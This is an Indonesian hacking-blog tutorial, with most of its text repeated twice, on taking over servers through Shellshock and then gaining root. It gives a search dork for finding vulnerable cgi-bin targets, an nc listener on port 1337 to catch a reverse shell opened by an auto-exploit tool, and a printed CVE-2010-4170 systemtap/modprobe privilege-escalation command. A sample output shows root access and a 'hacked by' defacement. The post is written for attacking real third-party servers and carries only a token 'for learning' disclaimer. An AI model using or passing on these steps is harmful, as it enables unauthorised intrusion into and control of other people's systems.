From Shellshock Exploit to Server Full Root Acces
Minggu, 05 Juni 2016
Add Comment
From Shellshock Exploit to Server Full Root Acces - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul From Shellshock Exploit to Server Full Root Acces, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.
Sebenarnya Shellshock Exploit ini termasuk exploit lama. Saya kenal exploit ini di 2014 lalu. Namun beberapa hari belakangan ini kembali ramai semenjak teman teman dari IndoXploit Coders membuat tools autoexploit untuk bug ini, apalagi yang lebih menarik adalah rata rata yang vuln oleh exploit ini adalah server tua dimana kita bisa mendapat hak akses penuh alias id “root” di server yang kita retas tersebut.
Seperti screenshot diatas, kita benar benar mendapatkan akses root diserver target.
Dork :
intext:”Sun Microsystems, Inc. All rights reserved.” inurl:/cgi-bin/
use your brain bitch!
Tools :
Nah, setelah kalian mendapatkan web atau server yang dirasa vuln, kita bisa melakukan exploit shellshock nya.
Pertama dari VPS ( atau dari ip statis jika kalian punya ), kita lakukan back connect dengan memasukkan command
( 1337 adalah port yang akan kita buka, silahkan tentukan sendiri bebas )
Setelah itu dari tool autoexploitnya kita masukkan url target, ip dari VPS / ip publik kita, dan juga port yang kita gunakan untuk back connect tadi. Tools ini sendiri otomatis akan melakukan reverse shell sehingga kita akan mendapatkan bash shell dari server target di vps kita.
Pertama kita cek dulu di versi kernel nya.
Seperti yang saya katakan sebelumnya bahwa rata rata yang bakal vuln adalah server tua ( rata rata adalah 2010) , maka kita bisa melakukan previlege escalation disini memanfaatkan bug CVE-2010-4170.
Lihat detail exploitnya disini :
Nah bagi yang masih bingung, kalian bisa pelajari tentang manual exploit untuk shellshock sendiri disini :
Cukup sekian share kali ini, semoga bermanfaat, jangan lupa subscribe untuk mendapat tutorial terbaru.
Credit :
indoxploit.or.id – linuxsec.org
Sumber http://noob1t4.blogspot.com/
Sekian Artikel From Shellshock Exploit to Server Full Root Acces.
Sebenarnya Shellshock Exploit ini termasuk exploit lama. Saya kenal exploit ini di 2014 lalu. Namun beberapa hari belakangan ini kembali ramai semenjak teman teman dari IndoXploit Coders membuat tools autoexploit untuk bug ini, apalagi yang lebih menarik adalah rata rata yang vuln oleh exploit ini adalah server tua dimana kita bisa mendapat hak akses penuh alias id “root” di server yang kita retas tersebut.
Seperti screenshot diatas, kita benar benar mendapatkan akses root diserver target.
Dork :
intext:”Sun Microsystems, Inc. All rights reserved.” inurl:/cgi-bin/
use your brain bitch!
Tools :
Nah, setelah kalian mendapatkan web atau server yang dirasa vuln, kita bisa melakukan exploit shellshock nya.
Pertama dari VPS ( atau dari ip statis jika kalian punya ), kita lakukan back connect dengan memasukkan command
nc -l 1337
( 1337 adalah port yang akan kita buka, silahkan tentukan sendiri bebas )
Setelah itu dari tool autoexploitnya kita masukkan url target, ip dari VPS / ip publik kita, dan juga port yang kita gunakan untuk back connect tadi. Tools ini sendiri otomatis akan melakukan reverse shell sehingga kita akan mendapatkan bash shell dari server target di vps kita.
Pertama kita cek dulu di versi kernel nya.
uname -a
Seperti yang saya katakan sebelumnya bahwa rata rata yang bakal vuln adalah server tua ( rata rata adalah 2010) , maka kita bisa melakukan previlege escalation disini memanfaatkan bug CVE-2010-4170.
Lihat detail exploitnya disini :
[ttaserv@extranet tmp]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u
whatever
echo ” hacked by yzrinori “; uname -rv; whoami; id
hacked by yzrinori
2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010
root
uid=0(root) gid=0(root) groupes=500(ttaserv)
Nah bagi yang masih bingung, kalian bisa pelajari tentang manual exploit untuk shellshock sendiri disini :
Cukup sekian share kali ini, semoga bermanfaat, jangan lupa subscribe untuk mendapat tutorial terbaru.
Credit :
indoxploit.or.id – linuxsec.org
Sumber http://noob1t4.blogspot.com/
Sekian Artikel From Shellshock Exploit to Server Full Root Acces.
Terima kasih telah membaca artikel From Shellshock Exploit to Server Full Root Acces, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "From Shellshock Exploit to Server Full Root Acces"
Posting Komentar